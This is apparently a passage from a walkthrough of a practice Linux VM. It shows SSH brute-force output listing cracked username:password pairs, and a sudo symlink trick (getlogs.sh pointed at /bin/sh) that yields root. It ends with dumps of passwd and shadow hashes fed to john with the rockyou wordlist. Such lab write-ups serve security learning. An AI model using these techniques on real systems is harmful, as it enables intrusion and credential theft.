Command shell session 26 opened (192.168.1.130:42125 -> 192.168.1.120:22) at 2015-01-08 12:30:17 -0700 [+] 192.168.1.120:22 SSH - Success: 'kclemons:passw0rd' 'uid=1009(kclemons) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 27 opened (192.168.1.130:50416 -> 192.168.1.120:22) at 2015-01-08 12:30:20 -0700 [+] 192.168.1.120:22 SSH - Success: 'krenfro:master' 'uid=1048(krenfro) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 28 opened (192.168.1.130:51770 -> 192.168.1.120:22) at 2015-01-08 12:30:24 -0700 [+] 192.168.1.120:22 SSH - Success: 'ktso:1234' 'uid=1005(ktso) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 29 opened (192.168.1.130:41473 -> 192.168.1.120:22) at 2015-01-08 12:30:27 -0700 [+] 192.168.1.120:22 SSH - Success: 'kwebber:dragon' 'uid=1016(kwebber) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 30 opened (192.168.1.130:38814 -> 192.168.1.120:22) at 2015-01-08 12:30:30 -0700 [+] 192.168.1.120:22 SSH - Success: 'lmartinez:pepper' 'uid=1034(lmartinez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 31 opened (192.168.1.130:51877 -> 192.168.1.120:22) at 2015-01-08 12:30:34 -0700 [+] 192.168.1.120:22 SSH - Success: 'lmorales:football' 'uid=1028(lmorales) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 32 opened (192.168.1.130:54770 -> 192.168.1.120:22) at 2015-01-08 12:30:37 -0700 [+] 192.168.1.120:22 SSH - Success: 'mbryan:jennifer' 'uid=1042(mbryan) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 33 opened (192.168.1.130:45205 -> 192.168.1.120:22) at 2015-01-08 12:30:40 -0700 [+] 192.168.1.120:22 SSH - Success: 'mholland:jordan' 'uid=1041(mholland) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 34 opened (192.168.1.130:38046 -> 192.168.1.120:22) at 2015-01-08 12:30:43 -0700 [+] 192.168.1.120:22 SSH - Success: 'mnader:welcome' 'uid=1047(mnader) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 35 opened (192.168.1.130:60899 -> 192.168.1.120:22) at 2015-01-08 12:30:47 -0700 [+] 192.168.1.120:22 SSH - Success: 'mrodriguez:qwerty' 'uid=1026(mrodriguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 36 opened (192.168.1.130:51135 -> 192.168.1.120:22) at 2015-01-08 12:30:50 -0700 [+] 192.168.1.120:22 SSH - Success: 'qpowers:michael' 'uid=1001(qpowers) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 37 opened (192.168.1.130:35915 -> 192.168.1.120:22) at 2015-01-08 12:30:53 -0700 [+] 192.168.1.120:22 SSH - Success: 'rdominguez:12345' 'uid=1010(rdominguez) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 38 opened (192.168.1.130:53430 -> 192.168.1.120:22) at 2015-01-08 12:30:56 -0700 [+] 192.168.1.120:22 SSH - Success: 'rjacobson:111111' 'uid=1043(rjacobson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 39 opened (192.168.1.130:34041 -> 192.168.1.120:22) at 2015-01-08 12:31:00 -0700 [+] 192.168.1.120:22 SSH - Success: 'rpatel:1234567' 'uid=1045(rpatel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 40 opened (192.168.1.130:34844 -> 192.168.1.120:22) at 2015-01-08 12:31:03 -0700 [+] 192.168.1.120:22 SSH - Success: 'sgains:computer' 'uid=1019(sgains) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 41 opened (192.168.1.130:54407 -> 192.168.1.120:22) at 2015-01-08 12:31:06 -0700 [+] 192.168.1.120:22 SSH - Success: 'sjohnson:12345678' 'uid=1046(sjohnson) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 42 opened (192.168.1.130:40759 -> 192.168.1.120:22) at 2015-01-08 12:31:09 -0700 [+] 192.168.1.120:22 SSH - Success: 'strammel:monkey' 'uid=1006(strammel) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 43 opened (192.168.1.130:55731 -> 192.168.1.120:22) at 2015-01-08 12:31:12 -0700 [+] 192.168.1.120:22 SSH - Success: 'swarren:Password' 'uid=1007(swarren) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 44 opened (192.168.1.130:52038 -> 192.168.1.120:22) at 2015-01-08 12:31:16 -0700 [+] 192.168.1.120:22 SSH - Success: 'tdeleon:soccer' 'uid=1038(tdeleon) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 45 opened (192.168.1.130:48251 -> 192.168.1.120:22) at 2015-01-08 12:31:19 -0700 [+] 192.168.1.120:22 SSH - Success: 'tgoodchap:nintendo' 'uid=1030(tgoodchap) gid=100(users) groups=100(users) Linux slax 2.6.27.27 #1 SMP Wed Jul 22 07:27:34 AKDT 2009 i686 Intel(R) Core(TM) i7-2640M CPU @ 2.80GHz GenuineIntel GNU/Linux ' [*] Command shell session 46 opened (192.168.1.130:36430 -> 192.168.1.120:22) at 2015-01-08 12:31:22 -0700 [-] 192.168.1.120:22 SSH - Failed: ':' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
I haven’t cracked root yet but notice this “‘ccoffee:0’ ‘uid=1044(ccoffee) gid=100(users) groups=100(users),102(admin)”. the 102 admin group id is promising.
Linux 2.6.27.27. ccoffee@slax:~$ ls DONOTFORGET* scripts/ ccoffee@slax:~$ cat DONOTFORGET remember your 20th anniversary on the 5th!!!!!!!!!1111!! ccoffee@slax:~$ cd scripts/ ccoffee@slax:~/scripts$ ls getlogs.sh* ccoffee@slax:~/scripts$ cat getlogs.sh cat: getlogs.sh: Permission denied ccoffee@slax:~/scripts$
Permission denied!
ccoffee@slax:~$ mv scripts/ scripts.old ccoffee@slax:~$ mkdir scripts ccoffee@slax:~$ ln -s /bin/sh scripts/getlogs.sh ccoffee@slax:~$ ls -l scripts/getlogs.sh lrwxrwxrwx 1 ccoffee users 7 Jan 7 23:03 scripts/getlogs.sh -> /bin/sh* ccoffee@slax:~$ sudo scripts/getlogs.sh
What this did was move the old script folder that I didn’t have permissions to into the .old folder. The new getlogs.sh folder is linked to the shell command so doing sudo getlogs.sh creates a root shell.
There is no specific challenge so once you are on the system look around and be awesome.
root@slax:/etc# cat passwd root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games:/bin/false ftp:x:14:50::/home/ftp:/bin/false smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/:/bin/false gdm:x:42:42:GDM:/var/state/gdm:/bin/bash apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false pop:x:90:90:POP:/:/bin/false nobody:x:99:99:nobody:/:/bin/false aard:x:1000:100:Aaron Ard:/home/aard: qpowers:x:1001:100:Quinton Powers:/home/qpowers: jbresnahan:x:1002:100:Jay Bresnahan:/home/jbresnahan: aadams:x:1003:100:Adam Adams:/home/aadams: jdavenport:x:1004:100:James Davenport:/home/jdavenport: ktso:x:1005:100:Kristen Tso:/home/ktso: strammel:x:1006:100:Stephanie Trammel:/home/strammel: swarren:x:1007:100:Samuel Warren:/home/swarren: myajima:x:1008:100:Moto Yajima:/home/myajima: kclemons:x:1009:100:Kathryn Clemons:/home/kclemons: rdominguez:x:1010:100:Rafael Dominguez:/home/rdominguez: djohnson:x:1011:100:Daniel Johnson:/home/djohnson: bbanter:x:1012:100:Bob Banter:/home/bbanter: jalvarez:x:1013:100:Joy Alvarez:/home/jalvarez: dgilfillan:x:1014:100:Darcy Gilfillan:/home/dgilfillan: dgrant:x:1015:100:Daniel Grant:/home/dgrant: kwebber:x:1016:100:Kathleen Webber:/home/kwebber: aheflin:x:1017:100:Anna Heflin:/home/aheflin: amaynard:x:1018:100:Arthur Maynard:/home/amaynard: sgains:x:1019:100:Susan Gains:/home/sgains: jduff:x:1020:100:Jerry Duff:/home/jduff: hlovell:x:1021:100:Henrietta Lovell:/home/hlovell: cchisholm:x:1022:100:Cindy Chisholm:/home/cchisholm: dstevens:x:1023:100:Donald Stevens:/home/dstevens: bphillips:x:1024:100:Brad Phillips:/home/bphillips: dwestling:x:1025:100:David Westling:/home/dwestling: mrodriguez:x:1026:100:Manuel Rodriguez:/home/mrodriguez: jfranklin:x:1027:100:Johnny Franklin:/home/jfranklin: lmorales:x:1028:100:Lindsey Morales:/home/lmorales: jayala:x:1029:100:John Ayala:/home/jayala: tgoodchap:x:1030:100:Taj Goodchap:/home/tgoodchap: aallen:x:1031:100:Aaron Allen:/home/aallen: aweiland:x:1032:100:Adam Weiland:/home/aweiland: dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor: lmartinez:x:1034:100:Luis Martinez:/home/lmartinez: aspears:x:1035:100:Adam Spears:/home/aspears: dcooper:x:1036:100:Donald Cooper:/home/dcooper: bwatkins:x:1037:100:Brandon Watkins:/home/bwatkins: tdeleon:x:1038:100:Terrence Deleon:/home/tdeleon: aharp:x:1039:100:Annie Harp:/home/aharp: jalcantar:x:1040:100:Jesse Alcantar:/home/jalcantar: mholland:x:1041:100:Marian Holland:/home/mholland: mbryan:x:1042:100:Michael Bryan:/home/mbryan: rjacobson:x:1043:100:Randy Jacobson:/home/rjacobson: ccoffee:x:1044:100:Chad Coffee:/home/ccoffee: rpatel:x:1045:100:Randall Patel:/home/rpatel: sjohnson:x:1046:100:Steven Johnson:/home/sjohnson: mnader:x:1047:100:Muhammad Nader:/home/mnader: krenfro:x:1048:100:Kimberly Renfro:/home/krenfro: root@slax:/etc# cat shadow root:$1$6Hl/leIf$BHG4Z0HgNq2bnbRriQcCt/:16442:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: apache:*:9797:0::::: messagebus:*:9797:0::::: haldaemon:*:9797:0::::: nobody:*:9797:0::::: aard:$1$M/1naIfI$/dpCFIuWISrIGy408fP0U.:16442:0:99999:7::: qpowers:$1$oDCsaIfI$PlHnGw5Ylqoke4HOfDnz81:16442:0:99999:7::: jbresnahan:$1$nHExaIfI$xFPgXAOo9ktw2azn/qnbv.:16442:0:99999:7::: aadams:$1$TzF0bIfI$RvB2GZOb5WDCJX.agChuB1:16442:0:99999:7::: jdavenport:$1$3wl/neIf$kuBSySXsu5nSeNjMgBRjr1:16442:0:99999:7::: ktso:$1$t0KAbIfI$WPULPwgsjByt0ICV6.zMS1:16442:0:99999:7::: strammel:$1$lpLFbIfI$B9wU7zrHALtgO5PpTFEYJ1:16442:0:99999:7::: swarren:$1$TdNKbIfI$Duy.Uy2sGwqY6YsfTzX4h1:16442:0:99999:7::: myajima:$1$xJPPbIfI$SQc4btSCHeIIYPVE/.r6a.:16442:0:99999:7::: kclemons:$1$IURUbIfI$Tpisuh39vd16hd9Q2W198/:16442:0:99999:7::: rdominguez:$1$PDTZbIfI$xKK6A/ZQiFgWpYVzzd.Gw.:16442:0:99999:7::: djohnson:$1$buUebIfI$0gd4dWKyVH2.ufk8zSq.z0:16442:0:99999:7::: bbanter:$1$QWWjbIfI$GoRunRTIFvf9sOfrWttwS0:16442:0:99999:7::: jalvarez:$1$AHYobIfI$gqSV2utxp46bVc0MzOFCP.:16442:0:99999:7::: dgilfillan:$1$m0atbIfI$r5vprBT7DmEx/bNqH8RDM1:16442:0:99999:7::: dgrant:$1$7sbybIfI$8FbpRfuY.N8hX6Sn4A4PX.:16442:0:99999:7::: kwebber:$1$9hd1cIfI$Hsx2f74tHtVhioZegod8d.:16442:0:99999:7::: aheflin:$1$waf6cIfI$Yq12oAcx/c176h1LC/MHJ.:16442:0:99999:7::: amaynard:$1$nFhBcIfI$Q7LRuK3aMzhrdqZD1AjaF0:16442:0:99999:7::: sgains:$1$U3jGcIfI$pbF6mepdppQgEM1/OnOKS1:16442:0:99999:7::: jduff:$1$bskLcIfI$0xxI8JWghNZrwknfckK4I1:16442:0:99999:7::: hlovell:$1$0bmQcIfI$f7yj5xtUFVmGnMtEc0F0M/:16442:0:99999:7::: cchisholm:$1$2PoVcIfI$g2OHLIwZNfkSEwbkdXL.o/:16442:0:99999:7::: dstevens:$1$/MqacIfI$YrH3QJethu7PXmEB5cDvB.:16442:0:99999:7::: bphillips:$1$3BsfcIfI$AnYSJSkRMC5yvbTQIdHPN1:16442:0:99999:7::: dwestling:$1$nvtkcIfI$WOkUDONlGepzNXM37hzDW1:16442:0:99999:7::: mrodriguez:$1$LkvpcIfI$UYw1kRIkon2T3Kf/as.hD.:16442:0:99999:7::: jfranklin:$1$8XxucIfI$5V78VV1YZVUaq2PyRbH82/:16442:0:99999:7::: lmorales:$1$NOzzcIfI$xHUTPP/Myrqh8iBIF4sH00:16442:0:99999:7::: jayala:$1$r5//2dIf$WGWmk2GfQETfIqPvnu5Eb.:16442:0:99999:7::: tgoodchap:$1$Yo0/7dIf$jfLG8/Fv7873kFlascMdg1:16442:0:99999:7::: aallen:$1$Zm2/CdIf$tonJrOosRTYbCzxTYcBrJ.:16442:0:99999:7::: aweiland:$1$Jc4/HdIf$Iae3U0Lbu04YjxfO3t8f2/:16442:0:99999:7::: dtraylor:$1$db6/MdIf$5Wtmc3YxBJkLE3TjSqwX91:16442:0:99999:7::: lmartinez:$1$DH8/RdIf$vosY88nHAoqwPonN.tMBO1:16442:0:99999:7::: aspears:$1$.5A/WdIf$lt4KE9Mt01qjJwH0q/TaA.:16442:0:99999:7::: dcooper:$1$2pB/bdIf$9Bqi7D3JH7nO3YVuiKhfq.:16442:0:99999:7::: bwatkins:$1$biD/gdIf$PqXD41GXwTEtNnNSNP7ve1:16442:0:99999:7::: tdeleon:$1$VdF/ldIf$8VVkJorueLDB2XEdwRcvA/:16442:0:99999:7::: aharp:$1$GjH/qdIf$SXBGXRgsaGwWst2EVA4OK.:16442:0:99999:7::: jalcantar:$1$dXJ/vdIf$1kaaAoMN7832vQ.0h8idE1:16442:0:99999:7::: mholland:$1$HZL/.eIf$y0VAQHlJuHxJ09uHYYXYV1:16442:0:99999:7::: mbryan:$1$/kN/3eIf$b6lCYJUAEVi89QU501i/J.:16442:0:99999:7::: rjacobson:$1$WuP/8eIf$mbawyIozTk2s4rMW6.ruA/:16442:0:99999:7::: ccoffee:$1$8.S/DeIf$1FJ.To3iEN0LVosO0Xtzg/:16442:0:99999:7::: rpatel:$1$c8U/IeIf$g91rGG1w6ulFOgRto6R.D/:16442:0:99999:7::: sjohnson:$1$zoW/NeIf$I6x4GbMkhjKDps9B56Yrm0:16442:0:99999:7::: mnader:$1$u5Z/SeIf$9qy9RwXoat1fLfbQMjvri.:16442:0:99999:7::: krenfro:$1$Hwb/XeIf$626PVcnIxjUS6zrwWz40P.:16442:0:99999:7::: unshadow 120passwd 120shadow > 120unshadow john -rules -wordlist=/usr/share/wordlists/rockyou.txt 120unshadow